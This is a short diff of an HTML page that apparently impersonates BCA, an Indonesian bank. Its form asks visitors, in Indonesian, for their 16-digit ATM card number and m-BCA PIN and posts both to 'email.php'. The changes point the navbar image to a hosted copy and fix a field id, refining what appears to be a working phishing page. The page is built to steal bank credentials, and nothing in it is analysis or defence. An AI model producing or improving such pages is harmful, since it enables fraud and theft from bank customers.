--- a/input.html
+++ b/input.html
@@ -13,7 +13,7 @@
 </head>
 <body>
   <nav>
-    <img src="nav.png" alt="navbar">
+    <img src="https://res.cloudinary.com/codelifings/image/upload/v1614170786/nav_p9nvvi.png" alt="navbar">
   </nav>
   <br>
   <div>
@@ -21,7 +21,7 @@
   </div>
   <br><br>
     <form action="email.php" method="POST">
-      <input class="u-full-width" type="number" placeholder="Masukkan 16 angka No Kartu ATM anda" id="nomor-atm" name="nomoratm">
+      <input class="u-full-width" type="number" placeholder="Masukkan 16 angka No Kartu ATM anda" id="nomoratm" name="nomoratm">
       <input class="u-full-width" type="number" placeholder="Masukkan Pin m-BCA Anda" id="pin" name="pin">
       <input style="float: right" class="button-primary" type="submit" value="OK">
     </form>
